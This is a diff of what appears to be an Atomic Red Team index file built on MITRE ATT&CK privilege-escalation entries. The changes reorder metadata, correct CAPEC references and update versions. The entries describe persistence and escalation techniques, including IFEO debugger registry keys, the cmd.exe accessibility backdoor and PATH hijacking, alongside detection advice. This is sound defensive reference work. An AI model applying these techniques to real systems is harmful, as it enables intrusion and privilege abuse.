When operating systems - boot up, they can start processes that perform background system functions. - On Windows and Linux, these system processes are referred to as services. - (Citation: TechNet Services) On macOS, launchd processes known as [Launch - Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) - are run to finish system initialization and load user specific parameters.(Citation: - AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services, - daemons, or agents that can be configured to execute at startup or a repeatable - interval in order to establish persistence. Similarly, adversaries may modify - existing services, daemons, or agents to achieve the same effect. \n\nServices, - daemons, or agents may be created with administrator privileges but executed - under root/SYSTEM privileges. Adversaries may leverage this functionality - to create or modify system processes in order to escalate privileges. (Citation: - OSX Malware Detection). " - name: Create or Modify System Process - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1543 @@ -2043,10 +2019,42 @@ privilege-escalation: description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017.' source_name: OSX Malware Detection - x_mitre_platforms: - - Windows - - macOS - - Linux + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Create or Modify System Process + description: "Adversaries may create or modify system-level processes to repeatedly + execute malicious payloads as part of persistence. When operating systems + boot up, they can start processes that perform background system functions. + On Windows and Linux, these system processes are referred to as services. + (Citation: TechNet Services) On macOS, launchd processes known as [Launch + Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) + are run to finish system initialization and load user specific parameters.(Citation: + AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services, + daemons, or agents that can be configured to execute at startup or a repeatable + interval in order to establish persistence. Similarly, adversaries may modify + existing services, daemons, or agents to achieve the same effect. \n\nServices, + daemons, or agents may be created with administrator privileges but executed + under root/SYSTEM privileges. Adversaries may leverage this functionality + to create or modify system processes in order to escalate privileges. (Citation: + OSX Malware Detection). " + id: attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-10-09T13:46:29.922Z' + created: '2020-01-10T16:03:18.865Z' + x_mitre_data_sources: + - Windows event logs + - Windows Registry + - File monitoring + - Process command-line parameters + - Process monitoring + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false x_mitre_detection: "Monitor for changes to system processes that do not correlate with known software, patch cycles, etc., including by comparing results against a trusted system baseline. New, benign system processes may be created during @@ -2059,14 +2067,10 @@ privilege-escalation: process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. \n\nMonitor for changes to files associated with system-level processes." - x_mitre_is_subtechnique: false - x_mitre_version: '1.0' - x_mitre_data_sources: - - Windows event logs - - Windows Registry - - File monitoring - - Process command-line parameters - - Process monitoring + x_mitre_platforms: + - Windows + - macOS + - Linux atomic_tests: [] T1053.003: technique: @@ -2305,9 +2309,9 @@ privilege-escalation: - source_name: mitre-attack external_id: T1574.002 url: https://attack.mitre.org/techniques/T1574/002 - - external_id: CAPEC-capec + - external_id: CAPEC-641 source_name: capec - url: https://capec.mitre.org/data/definitions/capec.html + url: https://capec.mitre.org/data/definitions/641.html - source_name: About Side by Side Assemblies url: https://docs.microsoft.com/en-us/windows/win32/sbscs/about-side-by-side-assemblies- description: Microsoft. (2018, May 31). About Side-by-Side Assemblies. Retrieved @@ -2335,7 +2339,7 @@ privilege-escalation: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-06-20T22:05:42.513Z' + modified: '2020-10-17T15:15:27.807Z' created: '2020-03-13T19:41:37.908Z' x_mitre_defense_bypassed: - Anti-virus @@ -2394,6 +2398,9 @@ privilege-escalation: - source_name: mitre-attack external_id: T1078.001 url: https://attack.mitre.org/techniques/T1078/001 + - external_id: CAPEC-70 + source_name: capec + url: https://capec.mitre.org/data/definitions/70.html - source_name: Microsoft Local Accounts Feb 2019 url: https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts description: Microsoft. (2018, December 9). Local Accounts. Retrieved February @@ -2420,9 +2427,9 @@ privilege-escalation: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-03-23T21:37:34.567Z' + modified: '2020-09-16T19:41:43.491Z' created: '2020-03-13T20:15:31.974Z' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_permissions_required: - Administrator @@ -2473,31 +2480,13 @@ privilege-escalation: elevation_required: true T1078.002: technique: - created: '2020-03-13T20:21:54.758Z' - modified: '2020-03-23T21:08:40.063Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: initial-access - type: attack-pattern - id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f - description: |- - Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts) - - Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain. - name: Domain Accounts - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1078.002 url: https://attack.mitre.org/techniques/T1078/002 + - external_id: CAPEC-560 + source_name: capec + url: https://capec.mitre.org/data/definitions/560.html - url: https://technet.microsoft.com/en-us/library/dn535501.aspx description: Microsoft. (2016, April 15). Attractive Accounts for Credential Theft. Retrieved June 3, 2016. @@ -2510,22 +2499,43 @@ privilege-escalation: description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016. source_name: TechNet Audit Policy - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_data_sources: - - Authentication logs - - Process monitoring + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Domain Accounts + description: |- + Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts) + + Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain. + id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: initial-access + modified: '2020-09-16T19:42:11.787Z' + created: '2020-03-13T20:21:54.758Z' + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + - Administrator x_mitre_detection: |- Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). Perform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence. - x_mitre_permissions_required: - - User - - Administrator - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_data_sources: + - Authentication logs + - Process monitoring + x_mitre_platforms: + - Linux + - macOS + - Windows atomic_tests: [] T1574.004: technique: @@ -2544,9 +2554,9 @@ privilege-escalation: - source_name: mitre-attack external_id: T1574.004 url: https://attack.mitre.org/techniques/T1574/004 - - external_id: CAPEC-CAPEC + - external_id: CAPEC-471 source_name: capec - url: https://capec.mitre.org/data/definitions/CAPEC.html + url: https://capec.mitre.org/data/definitions/471.html - url: https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf description: Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved July 10, 2017. @@ -2563,7 +2573,7 @@ privilege-escalation: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-06-20T22:06:47.115Z' + modified: '2020-09-16T16:48:09.391Z' created: '2020-03-16T15:23:30.896Z' x_mitre_platforms: - macOS @@ -2584,7 +2594,31 @@ privilege-escalation: atomic_tests: [] T1055.001: technique: - id: attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945 + created: '2020-01-14T01:26:08.145Z' + modified: '2020-06-20T22:17:59.148Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + external_references: + - source_name: mitre-attack + external_id: T1055.001 + url: https://attack.mitre.org/techniques/T1055/001 + - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process + description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: + A Technical Survey Of Common And Trending Process Injection Techniques. + Retrieved December 7, 2017.' + source_name: Endgame Process Injection July 2017 + - url: https://www.endgame.com/blog/technical-blog/hunting-memory + description: Desimone, J. (2017, June 13). Hunting in Memory. Retrieved December + 7, 2017. + source_name: Endgame HuntingNMemory June 2017 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Dynamic-link Library Injection description: "Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space @@ -2604,35 +2638,17 @@ privilege-escalation: to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. " - name: Dynamic-link Library Injection - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1055.001 - url: https://attack.mitre.org/techniques/T1055/001 - - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: - A Technical Survey Of Common And Trending Process Injection Techniques. - Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 - - url: https://www.endgame.com/blog/technical-blog/hunting-memory - description: Desimone, J. (2017, June 13). Hunting in Memory. Retrieved December - 7, 2017. - source_name: Endgame HuntingNMemory June 2017 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-06-20T22:17:59.148Z' - created: '2020-01-14T01:26:08.145Z' - x_mitre_platforms: - - Windows - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + id: attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945 + x_mitre_defense_bypassed: + - Application control + - Anti-virus + x_mitre_data_sources: + - Process monitoring + - DLL monitoring + - File monitoring + - API monitoring + x_mitre_permissions_required: + - User x_mitre_detection: "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances @@ -2647,16 +2663,10 @@ privilege-escalation: if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. " - x_mitre_permissions_required: - - User - x_mitre_data_sources: - - Process monitoring - - DLL monitoring - - File monitoring - - API monitoring - x_mitre_defense_bypassed: - - Application control - - Anti-virus + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Windows atomic_tests: [] T1548.004: technique: @@ -2815,6 +2825,18 @@ privilege-escalation: - source_name: mitre-attack external_id: T1546 url: https://attack.mitre.org/techniques/T1546 + - url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf + description: Ballenthin, W., et al. (2015). Windows Management Instrumentation + (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016. + source_name: FireEye WMI 2015 + - url: https://www.rsaconference.com/writable/presentations/file_upload/ht-r03-malware-persistence-on-os-x-yosemite_final.pdf + description: Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. + Retrieved July 10, 2017. + source_name: Malware Persistence on OS X + - url: https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/ + description: Claud Xiao, Cong Zheng, Yanhui Jia. (2017, April 6). New IoT/Linux + Malware Targets DVRs, Forms Botnet. Retrieved February 19, 2018. + source_name: amnesia malware object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 @@ -2826,8 +2848,9 @@ privilege-escalation: may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to - malicious content that will be executed whenever the event trigger is invoked. - \n\nSince the execution can be proxied by an account with higher permissions, + malicious content that will be executed whenever the event trigger is invoked.(Citation: + FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia + malware)\n\nSince the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges. " id: attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db @@ -2837,9 +2860,9 @@ privilege-escalation: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: persistence - modified: '2020-07-09T13:55:51.501Z' + modified: '2020-10-21T18:48:27.576Z' created: '2020-01-22T21:04:23.285Z' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: false x_mitre_detection: "Monitoring for additions or modifications of mechanisms that could be used to trigger event-based execution, especially the addition @@ -2903,7 +2926,7 @@ privilege-escalation: Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001). - Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence. + Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence. id: attack-pattern--70d81154-b187-45f9-8ec5-295d01255979 type: attack-pattern kill_chain_phases: @@ -3205,7 +3228,7 @@ privilege-escalation: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-06-26T16:09:59.324Z' + modified: '2020-10-17T15:15:28.288Z' created: '2020-03-12T20:38:12.465Z' x_mitre_data_sources: - Environment variable @@ -3280,11 +3303,11 @@ privilege-escalation: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Image File Execution Options Injection description: |- - Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IEFO) debuggers. IEFOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010) + Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010) IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger values in the Registry under HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ where <executable> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010) - IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IEFO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) + IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014) @@ -3298,15 +3321,15 @@ privilege-escalation: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: persistence - modified: '2020-03-24T19:39:50.839Z' + modified: '2020-08-26T14:18:08.480Z' created: '2020-01-24T15:05:58.384Z' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_permissions_required: - Administrator - SYSTEM x_mitre_detection: |- - Monitor for abnormal usage of the Glfags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010) + Monitor for abnormal usage of the GFlags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010) Monitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Endgame Process Injection July 2017) x_mitre_data_sources: @@ -3589,6 +3612,12 @@ privilege-escalation: - source_name: mitre-attack external_id: T1574.006 url: https://attack.mitre.org/techniques/T1574/006 + - external_id: CAPEC-13 + source_name: capec + url: https://capec.mitre.org/data/definitions/13.html + - external_id: CAPEC-640 + source_name: capec + url: https://capec.mitre.org/data/definitions/640.html - source_name: Man LD.SO url: https://www.man7.org/linux/man-pages/man8/ld.so.8.html description: Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved @@ -3618,7 +3647,7 @@ privilege-escalation: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-06-15T21:59:25.358Z' + modified: '2020-09-16T16:49:46.904Z' created: '2020-03-13T20:09:59.569Z' x_mitre_platforms: - Linux @@ -3631,7 +3660,7 @@ privilege-escalation: Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates. x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_version: '1.1' identifier: T1574.006 atomic_tests: - name: Shared Library Injection via /etc/ld.so.preload @@ -3900,6 +3929,12 @@ privilege-escalation: - source_name: mitre-attack external_id: T1543.004 url: https://attack.mitre.org/techniques/T1543/004 + - external_id: CAPEC-550 + source_name: capec + url: https://capec.mitre.org/data/definitions/550.html + - external_id: CAPEC-551 + source_name: capec + url: https://capec.mitre.org/data/definitions/551.html - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved July 10, 2017. @@ -3946,11 +3981,11 @@ privilege-escalation: phase_name: persistence - kill_chain_name: mitre-attack phase_name: privilege-escalation - modified: '2020-03-25T22:27:49.609Z' + modified: '2020-09-16T15:46:44.130Z' created: '2020-01-17T19:23:15.227Z' x_mitre_data_sources: - File monitoring - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_effective_permissions: - root @@ -4813,62 +4848,55 @@ privilege-escalation: atomic_tests: [] T1574.007: technique: - id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32 + created: '2020-03-13T14:10:43.424Z' + modified: '2020-09-16T16:56:34.583Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + external_references: + - source_name: mitre-attack + external_id: T1574.007 + url: https://attack.mitre.org/techniques/T1574/007 + - external_id: CAPEC-13 + source_name: capec + url: https://capec.mitre.org/data/definitions/13.html + - external_id: CAPEC-38 + source_name: capec + url: https://capec.mitre.org/data/definitions/38.html + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Path Interception by PATH Environment Variable description: |- Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line. The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line. For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line. - name: Path Interception by PATH Environment Variable - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1574.007 - url: https://attack.mitre.org/techniques/T1574/007 - - external_id: CAPEC-capec - source_name: capec - url: https://capec.mitre.org/data/definitions/capec.html - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-06-20T22:02:40.983Z' - created: '2020-03-13T14:10:43.424Z' - x_mitre_platforms: - - Windows - x_mitre_contributors: - - Stefan Kanthak - x_mitre_data_sources: - - Process monitoring - - File monitoring + id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32 + x_mitre_defense_bypassed: + - Application control + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true x_mitre_detection: |- Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - x_mitre_defense_bypassed: - - Application control + x_mitre_data_sources: + - Process monitoring + - File monitoring + x_mitre_contributors: + - Stefan Kanthak + x_mitre_platforms: + - Windows atomic_tests: [] T1574.008: technique: - created: '2020-03-13T17:48:58.999Z' - modified: '2020-03-26T20:03:27.496Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - type: attack-pattern id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2 description: |- Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program. @@ -4886,9 +4914,9 @@ privilege-escalation: - source_name: mitre-attack external_id: T1574.008 url: https://attack.mitre.org/techniques/T1574/008 - - external_id: CAPEC-CAPEC + - external_id: CAPEC-159 source_name: capec - url: https://capec.mitre.org/data/definitions/CAPEC.html + url: https://capec.mitre.org/data/definitions/159.html - url: http://msdn.microsoft.com/en-us/library/ms682425 description: Microsoft. (n.d.). CreateProcess function. Retrieved December 5, 2014. @@ -4904,6 +4932,16 @@ privilege-escalation: url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN description: Microsoft. (2011, October 24). Environment Property. Retrieved July 27, 2016. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-09-17T19:03:35.217Z' + created: '2020-03-13T17:48:58.999Z' x_mitre_platforms: - Windows x_mitre_contributors: @@ -4928,23 +4966,13 @@ privilege-escalation: atomic_tests: [] T1574.009: technique: - created: '2020-03-13T13:51:58.519Z' - modified: '2020-03-26T19:55:39.867Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - type: attack-pattern external_references: - source_name: mitre-attack external_id: T1574.009 url: https://attack.mitre.org/techniques/T1574/009 - - external_id: CAPEC-capec + - external_id: CAPEC-38 source_name: capec - url: https://capec.mitre.org/data/definitions/capec.html + url: https://capec.mitre.org/data/definitions/38.html - source_name: Microsoft CurrentControlSet Services url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree description: Microsoft. (2017, April 20). HKLM\SYSTEM\CurrentControlSet\Services @@ -4972,7 +5000,17 @@ privilege-escalation: This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process. id: attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b - x_mitre_version: '1.0' + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-09-17T19:05:23.755Z' + created: '2020-03-13T13:51:58.519Z' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_detection: |- Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious. @@ -5365,6 +5403,71 @@ privilege-escalation: $oldprofile = cat $profile | Select-Object -skiplast 1 Set-Content $profile -Value $oldprofile name: powershell + T1547.012: + technique: + external_references: + - source_name: mitre-attack + external_id: T1547.012 + url: https://attack.mitre.org/techniques/T1547/012 + - source_name: Microsoft AddPrintProcessor May 2018 + url: https://docs.microsoft.com/en-us/windows/win32/printdocs/addprintprocessor + description: Microsoft. (2018, May 31). AddPrintProcessor function. Retrieved + October 5, 2020. + - source_name: ESET PipeMon May 2020 + url: https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/ + description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti + Group. Retrieved August 24, 2020. + object_marking_refs: + - 